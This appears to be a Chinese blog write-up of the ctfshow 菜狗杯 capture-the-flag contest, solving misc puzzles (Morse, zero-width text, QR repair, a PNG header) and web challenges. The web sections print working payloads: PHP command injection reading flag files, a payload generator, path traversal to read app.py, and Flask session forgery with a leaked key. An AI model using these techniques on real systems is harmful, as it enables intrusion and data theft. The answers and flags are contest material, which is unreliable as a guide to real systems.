ctfshow-菜狗杯WP

杂项

我是谁?

直接对照列表做就行了,就是有些费眼睛

You and me

利用BlindWatermark-master将两张图片作为输入,输出盲水印即可

7.1.05

附件.SAV文件显然是一个游戏存档
通过搜索提示中的QQ号754365305可知该游戏是金融帝国
而题目名7.1.05显然是一个版本号
可知应该要下载该游戏的对应版本,然后载入游戏文档

按这个思路进到游戏里面根据提示一步步获得flag即可

黑丝白丝还有什么丝

题目提示是莫斯密码
对着题目敲摩斯密码

.-- ....- -. - - ----- -... ...-- -- --- .-. . -.-. ..- - .

用摩斯密码翻译工具翻译出来就是flag

我吐了你随意

由文件名提示可知是零宽隐写
把文本复制,然后去翻就行辽

迅疾响应

二维码扫不出来滴
得用qrazybox
[QRazyBox在线地址]((https://merricx.github.io/qrazybox/)
载入图片
assets/ctfshow-菜狗杯WP(更新中)/file-20250604194141573.png
使用右上角的tools中的Extract QR Information
得到前半部分flag

assets/ctfshow-菜狗杯WP(更新中)/file-20250604194252656.png
得到前半部分flag

下面的步骤就很神仙了,思路相对清奇,不看官方wp确实难做
用左侧的画笔把左侧纠错区涂白
assets/ctfshow-菜狗杯WP(更新中)/file-20250604195054950.png
之后再extract一下就可以了

assets/ctfshow-菜狗杯WP(更新中)/file-20250604195222161.png
最终flag为:ctfshow{11451419-1981-landexiangle}

打不开的图片

png图片前四个字节的十六进制值为

89 50 4E 47

而用010editor打开该图片发现其前四个字节的十六进制与本来应该是的值相加为100,故这里运用到求反运算
之后即可打开图片获得flag

web

web签到

把payload贴在下面

https://7547cfec-75c7-476c-8109-d1400777247b.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa");
post: a=b
cookie:CTFshow-QQ群:=a

刚开始没成功,后来发现得用edge的hackbar不行,得用Chrome的hackbar才能成功,也是有些莫名其妙的

我的眼里只有$

assets/ctfshow-菜狗杯WP(更新中)/file-20250604215308385.png
这道题考察的是变量的嵌套
所以我们得把一层层地递推出最深一层是的变量名

count = (len(input("请输入字符串:")))  
result = "_=a0"  
  
for i in range(count - 2):  
    result += '&' + 'a' + str(i) + '=' + 'a' + str(i + 1)  
  
result += '&a' + str(count - 2) + '=' + 'system("ls /");'  
  
print(f'输出结果是{result}:')

将输出结果用hackbar的post方法发送找到flag
assets/ctfshow-菜狗杯WP(更新中)/file-20250606190728728.png

最后再将"ls /"换成"cat /f*"即可获得flag

抽老婆

首先开抽试一下
assets/ctfshow-菜狗杯WP(更新中)/file-20250607083143931.png
挺好康的
简单浏览可以知道,这道题的重点并不在于图片
所以我们打开源码康康
assets/ctfshow-菜狗杯WP(更新中)/file-20250607083544253.png
出现了超可疑的链接:
/download?file=
所以我们尝试一下将file赋值成flag,但是没有成功
我们再尝试一张可能不存在的照片
就比如这样子"download?file=1.png"
assets/ctfshow-菜狗杯WP(更新中)/file-20250607085324807.png
发现页面使用了app.py文件,尝试把它下载下来
直接把路径复制下来找找看
assets/ctfshow-菜狗杯WP(更新中)/file-20250607085547306.png
根据报错信息可知,这里用到了路径的拼接
所以我们将file赋值为"../../app.py"
assets/ctfshow-菜狗杯WP(更新中)/file-20250607090114141.png
打开文件
assets/ctfshow-菜狗杯WP(更新中)/file-20250607091611399.png发现如果想拿到flag得执行getflag函数,而且得满足session值为'isadmin'
生成session所需秘钥也是可以找到的
assets/ctfshow-菜狗杯WP(更新中)/file-20250607091845518.png
所以利用flask_session_cookie_manager3.py工具脚本进行flask session伪造

python3 flask_session_cookie_manager3.py encode -t "{'isadmin':True}" -s "tanji_is_A_boy_Yooooooooooooooooooooo!"

得到session值:
eyJpc2FkbWluIjp0cnVlfQ.ZmufEg.vF6jyYAmenDHHQ6L9EyqeaYZqTM

利用该cookie值访问/secret_path_U_never_know即可获得flag

一言既出

assets/ctfshow-菜狗杯WP(更新中)/file-20250607103045193.png
对PHP代码进行分析
assets/ctfshow-菜狗杯WP(更新中)/file-20250607103055888.png

posted @ 2025-06-06 18:46  _F1ow  阅读(190)  评论(0)    收藏  举报